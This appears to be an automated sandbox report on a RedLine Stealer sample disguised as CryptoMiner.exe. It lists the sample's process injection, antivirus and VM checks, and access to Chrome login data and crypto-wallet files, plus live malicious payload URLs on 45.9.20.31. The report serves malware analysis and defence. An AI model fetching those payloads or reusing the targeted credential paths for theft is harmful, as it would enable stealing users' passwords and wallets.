                    Source: C:\Users\user\Desktop\CryptoMiner.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,
                    Source: C:\Users\user\Desktop\CryptoMiner.exeCode function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,InterlockedDecrement,InterlockedDecrement,InterlockedDecrement,_free,_free,
                    Source: C:\Users\user\Desktop\CryptoMiner.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,_strlen,GetLocaleInfoA,_strlen,_TestDefaultLanguage,
                    Source: C:\Users\user\Desktop\CryptoMiner.exeCode function: GetLocaleInfoW,_GetPrimaryLen,_strlen,
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\filename.exeQueries volume information: C:\Users\user\AppData\Local\Temp\filename.exe VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\filename.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-ds-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-base-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cat VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                    Source: C:\Users\user\Desktop\CryptoMiner.exeCode function: 0_2_00DA0041 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntivirusProduct
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntiSpyWareProduct
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM FirewallProduct
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntivirusProduct
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiSpyWareProduct
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM FirewallProduct

                    Stealing of Sensitive Information

                    barindex
                    Yara detected RedLine Stealer
                    Source: Yara matchFile source: dump.pcap, type: PCAP
                    Source: Yara matchFile source: 0.3.CryptoMiner.exe.d730000.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 12.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 12.0.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.CryptoMiner.exe.ae3760.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.3.CryptoMiner.exe.d730000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.3.CryptoMiner.exe.d730000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.CryptoMiner.exe.ae3760.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 12.0.InstallUtil.exe.400000.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000000.00000003.538097603.000000000D730000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000003.543077511.000000000D732000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000C.00000002.657180507.0000000002CF2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000C.00000000.543024251.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000C.00000000.542266865.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000C.00000002.648033641.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.548433577.0000000000AA4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 2140, type: MEMORYSTR
                    Found many strings related to Crypto-Wallets (likely being stolen)
                    Source: InstallUtil.exe, 0000000C.00000002.657180507.0000000002CF2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: ElectrumE#
                    Source: InstallUtil.exe, 0000000C.00000002.658034449.0000000002E0D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: m2C:\Users\user\AppData\Roaming\Electrum\wallets\*
                    Source: InstallUtil.exe, 0000000C.00000002.657180507.0000000002CF2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: JaxxE#
                    Source: InstallUtil.exe, 0000000C.00000002.658034449.0000000002E0D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: %appdata%\Exodus\exodus.wallet
                    Source: InstallUtil.exe, 0000000C.00000002.658034449.0000000002E0D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: %appdata%\Ethereum\wallets
                    Source: InstallUtil.exe, 0000000C.00000002.657180507.0000000002CF2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: ExodusE#
                    Source: InstallUtil.exe, 0000000C.00000002.657180507.0000000002CF2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: EthereumE#
                    Source: InstallUtil.exe, 0000000C.00000002.658034449.0000000002E0D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: m6C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\*
                    Source: powershell.exe, 0000001D.00000002.715187766.00007FF9F0040000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: sqlcolumnencryptionkeystoreprovider
                    Tries to harvest and steal browser information (history, passwords, etc)
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                    Tries to steal Crypto Currency Wallets
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Roaming\Ethereum\wallets\
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
                    Source: Yara matchFile source: 0000000C.00000002.657180507.0000000002CF2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000C.00000002.658034449.0000000002E0D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 2140, type: MEMORYSTR

                    Remote Access Functionality

                    barindex
                    Yara detected RedLine Stealer
                    Source: Yara matchFile source: dump.pcap, type: PCAP
                    Source: Yara matchFile source: 0.3.CryptoMiner.exe.d730000.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 12.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 12.0.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.CryptoMiner.exe.ae3760.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.3.CryptoMiner.exe.d730000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.3.CryptoMiner.exe.d730000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.CryptoMiner.exe.ae3760.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 12.0.InstallUtil.exe.400000.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000000.00000003.538097603.000000000D730000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000003.543077511.000000000D732000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000C.00000002.657180507.0000000002CF2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000C.00000000.543024251.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000C.00000000.542266865.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000C.00000002.648033641.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.548433577.0000000000AA4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 2140, type: MEMORYSTR

                    Mitre Att&ck Matrix

                    Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                    Valid Accounts221
                    Windows Management Instrumentation                    		Path Interception311
                    Process Injection                    		1
                    Disable or Modify Tools                    		1
                    OS Credential Dumping                    		1
                    System Time Discovery                    		Remote Services11
                    Archive Collected Data                    		Exfiltration Over Other Network Medium11
                    Ingress Tool Transfer                    		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                    Default Accounts12
                    Native API                    		Boot or Logon Initialization ScriptsBoot or Logon Initialization Scripts111
                    Deobfuscate/Decode Files or Information                    		LSASS Memory1
                    File and Directory Discovery                    		Remote Desktop Protocol3
                    Data from Local System                    		Exfiltration Over Bluetooth1
                    Encrypted Channel                    		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                    Domain Accounts1
                    Command and Scripting Interpreter                    		Logon Script (Windows)Logon Script (Windows)31
                    Obfuscated Files or Information                    		Security Account Manager134
                    System Information Discovery                    		SMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration1
                    Non-Standard Port                    		Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                    Local Accounts1
                    PowerShell                    		Logon Script (Mac)Logon Script (Mac)2
                    Software Packing                    		NTDS661
                    Security Software Discovery                    		Distributed Component Object ModelInput CaptureScheduled Transfer2
                    Non-Application Layer Protocol                    		SIM Card SwapCarrier Billing Fraud
                    Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script1
                    Masquerading                    		LSA Secrets11
                    Process Discovery                    		SSHKeyloggingData Transfer Size Limits12
                    Application Layer Protocol                    		Manipulate Device CommunicationManipulate App Store Rankings or Ratings
                    Replication Through Removable MediaLaunchdRc.commonRc.common351
                    Virtualization/Sandbox Evasion                    		Cached Domain Credentials351
                    Virtualization/Sandbox Evasion                    		VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                    External Remote ServicesScheduled TaskStartup ItemsStartup Items311
                    Process Injection                    		DCSync1
                    Application Window Discovery                    		Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                    Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc Filesystem1
                    Remote System Discovery                    		Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
                    Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Masquerading/etc/passwd and /etc/shadow1
                    System Network Configuration Discovery                    		Software Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction

                    Behavior Graph

                    Hide Legend

                    Legend:

                    • Process
                    • Signature
                    • Created File
                    • DNS/IP Info
                    • Is Dropped
                    • Is Windows Process
                    • Number of created Registry Values
                    • Number of created Files
                    • Visual Basic
                    • Delphi
                    • Java
                    • .Net C# or VB.NET
                    • C, C++ or other language
                    • Is malicious
                    • Internet
                    behaviorgraph top1 signatures2 2 Behavior Graph ID: 620659 Sample: CryptoMiner.exe Startdate: 05/05/2022 Architecture: WINDOWS Score: 100 54 Snort IDS alert for network traffic 2->54 56 Found malware configuration 2->56 58 Malicious sample detected (through community Yara rule) 2->58 60 8 other signatures 2->60 9 CryptoMiner.exe 2->9         started        process3 signatures4 68 Writes to foreign memory regions 9->68 70 Allocates memory in foreign processes 9->70 72 Injects a PE file into a foreign processes 9->72 12 InstallUtil.exe 15 8 9->12         started        process5 dnsIp6 40 65.21.213.209, 32936, 49796 CP-ASDE United States 12->40 42 45.9.20.31, 49802, 80 DEDIPATH-LLCUS Russian Federation 12->42 34 C:\Users\user\AppData\Local\Temp\fname.exe, PE32 12->34 dropped 36 C:\Users\user\AppData\Local\...\filename.exe, PE32+ 12->36 dropped 74 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 12->74 76 Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines) 12->76 78 Tries to harvest and steal browser information (history, passwords, etc) 12->78 80 Tries to steal Crypto Currency Wallets 12->80 17 fname.exe 1 12->17         started        20 filename.exe 2 12->20         started        file7 signatures8 process9 signatures10 44 Antivirus detection for dropped file 17->44 46 Multi AV Scanner detection for dropped file 17->46 48 Query firmware table information (likely to detect VMs) 17->48 52 4 other signatures 17->52 22 AppLaunch.exe 14 3 17->22         started        26 conhost.exe 17->26         started        50 Machine Learning detection for dropped file 20->50 28 cmd.exe 1 20->28         started        process11 dnsIp12 38 ip-api.com 208.95.112.1, 49832, 80 TUT-ASUS United States 22->38 62 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 22->62 64 May check the online IP address of the machine 22->64 66 Encrypted powershell cmdline option found 28->66 30 powershell.exe 14 28->30         started        32 conhost.exe 28->32         started        signatures13 process14

                    Screenshots

                    Thumbnails

                    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                    windows-stand

                    Antivirus, Machine Learning and Genetic Malware Detection

                    Initial Sample

                    SourceDetectionScannerLabelLink
                    CryptoMiner.exe17%ReversingLabsWin32.Trojan.CrypterX
                    CryptoMiner.exe100%Joe Sandbox ML

                    Dropped Files

                    SourceDetectionScannerLabelLink
                    C:\Users\user\AppData\Local\Temp\filename.exe100%AviraHEUR/AGEN.1221911
                    C:\Users\user\AppData\Local\Temp\fname.exe100%AviraTR/AD.GenSteal.jziki
                    C:\Users\user\AppData\Local\Temp\filename.exe100%Joe Sandbox ML
                    C:\Users\user\AppData\Local\Temp\fname.exe100%Joe Sandbox ML
                    C:\Users\user\AppData\Local\Temp\filename.exe29%MetadefenderBrowse
                    C:\Users\user\AppData\Local\Temp\filename.exe81%ReversingLabsWin64.Worm.AutoRun
                    C:\Users\user\AppData\Local\Temp\fname.exe31%MetadefenderBrowse
                    C:\Users\user\AppData\Local\Temp\fname.exe69%ReversingLabsWin32.Trojan.FormBook

                    Unpacked PE Files

                    SourceDetectionScannerLabelLinkDownload
                    12.0.InstallUtil.exe.400000.0.unpack100%AviraHEUR/AGEN.1247441Download File
                    12.2.InstallUtil.exe.400000.0.unpack100%AviraHEUR/AGEN.1247441Download File
                    20.3.fname.exe.2f70000.0.unpack100%AviraHEUR/AGEN.1203048Download File
                    0.3.CryptoMiner.exe.d730000.0.unpack100%AviraHEUR/AGEN.1247441Download File
                    23.2.filename.exe.850000.0.unpack100%AviraHEUR/AGEN.1221911Download File
                    0.3.CryptoMiner.exe.d730000.1.unpack100%AviraHEUR/AGEN.1247441Download File
                    12.0.InstallUtil.exe.400000.1.unpack100%AviraHEUR/AGEN.1247441Download File
                    23.0.filename.exe.850000.0.unpack100%AviraHEUR/AGEN.1221911Download File
                    22.2.AppLaunch.exe.400000.0.unpack100%AviraHEUR/AGEN.1203048Download File

                    Domains

                    No Antivirus matches

                    URLs

                    SourceDetectionScannerLabelLink
                    http://tempuri.org/Entity/Id12Response0%URL Reputationsafe
                    http://tempuri.org/0%URL Reputationsafe
                    http://tempuri.org/Entity/Id2Response0%URL Reputationsafe
                    http://45.9.20.314Vl0%Avira URL Cloudsafe
                    http://ns.adobe.c/g0%URL Reputationsafe
                    http://tempuri.org/Entity/Id21Response0%URL Reputationsafe
                    http://tempuri.org/Entity/Id90%URL Reputationsafe
                    http://tempuri.org/Entity/Id80%URL Reputationsafe
                    http://tempuri.org/Entity/Id50%URL Reputationsafe
                    http://tempuri.org/Entity/Id40%URL Reputationsafe
                    http://tempuri.org/Entity/Id70%URL Reputationsafe
                    http://tempuri.org/Entity/Id60%URL Reputationsafe
                    http://tempuri.org/Entity/Id19Response0%URL Reputationsafe
                    http://45.9.20.31/rigx.exe100%Avira URL Cloudmalware
                    http://tempuri.org/Entity/Id15Response0%URL Reputationsafe
                    http://tempuri.org/Entity/Id6Response0%URL Reputationsafe
                    https://api.ip.sb/ip0%URL Reputationsafe
                    http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
                    http://tempuri.org/Entity/Id9Response0%URL Reputationsafe
                    https://contoso.com/Icon0%URL Reputationsafe
                    http://tempuri.org/Entity/Id200%URL Reputationsafe
                    http://tempuri.org/Entity/Id210%URL Reputationsafe
                    http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s0%URL Reputationsafe
                    http://tempuri.org/Entity/Id220%URL Reputationsafe
                    http://tempuri.org/Entity/Id230%URL Reputationsafe
                    http://tempuri.org/Entity/Id240%URL Reputationsafe
                    http://tempuri.org/Entity/Id24Response0%URL Reputationsafe
                    http://tempuri.org/Entity/Id1Response0%URL Reputationsafe
                    http://45.9.20.31/asdasdasd.exe100%Avira URL Cloudmalware
                    http://tempuri.org/Entity/Id100%URL Reputationsafe
                    http://tempuri.org/Entity/Id110%URL Reputationsafe
                    http://tempuri.org/Entity/Id120%URL Reputationsafe
                    http://tempuri.org/Entity/Id16Response0%URL Reputationsafe
                    http://tempuri.org/Entity/Id130%URL Reputationsafe
                    http://tempuri.org/Entity/Id140%URL Reputationsafe
                    http://tempuri.org/Entity/Id150%URL Reputationsafe
                    http://tempuri.org/Entity/Id160%URL Reputationsafe
                    http://tempuri.org/Entity/Id170%URL Reputationsafe
                    http://tempuri.org/Entity/Id180%URL Reputationsafe
                    http://tempuri.org/Entity/Id5Response0%URL Reputationsafe
                    http://tempuri.org/Entity/Id190%URL Reputationsafe
                    http://tempuri.org/Entity/Id10Response0%URL Reputationsafe
                    http://tempuri.org/Entity/Id8Response0%URL Reputationsafe
                    http://ocsp.sectigo.com00%URL Reputationsafe

                    Domains and IPs

                    Contacted Domains

                    NameIPActiveMaliciousAntivirus DetectionReputation
                    ip-api.com
                    		208.95.112.1
                    		truefalse
                      		high

                      Contacted URLs

                      NameMaliciousAntivirus DetectionReputation
                      http://45.9.20.31/rigx.exetrue
                      • Avira URL Cloud: malware
                      		unknown
                      http://45.9.20.31/asdasdasd.exetrue
                      • Avira URL Cloud: malware
                      		unknown

                      URLs from Memory and Binaries

                      NameSourceMaliciousAntivirus DetectionReputation
                      http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#TextInstallUtil.exe, 0000000C.00000002.657180507.0000000002CF2000.00000004.00000800.00020000.00000000.sdmpfalse
                        		high
                        http://schemas.xmlsoap.org/ws/2005/02/sc/sctInstallUtil.exe, 0000000C.00000002.657180507.0000000002CF2000.00000004.00000800.00020000.00000000.sdmpfalse
                          		high
                          https://duckduckgo.com/chrome_newtabInstallUtil.exe, 0000000C.00000003.616449035.000000000409D000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000C.00000002.662663297.00000000031A8000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000C.00000002.662472558.0000000003191000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000C.00000002.664565017.0000000003EC4000.00000004.00000800.00020000.00000000.sdmpfalse
                            		high
                            http://schemas.xmlsoap.org/ws/2004/04/security/sc/dkInstallUtil.exe, 0000000C.00000002.657180507.0000000002CF2000.00000004.00000800.00020000.00000000.sdmpfalse
                              		high
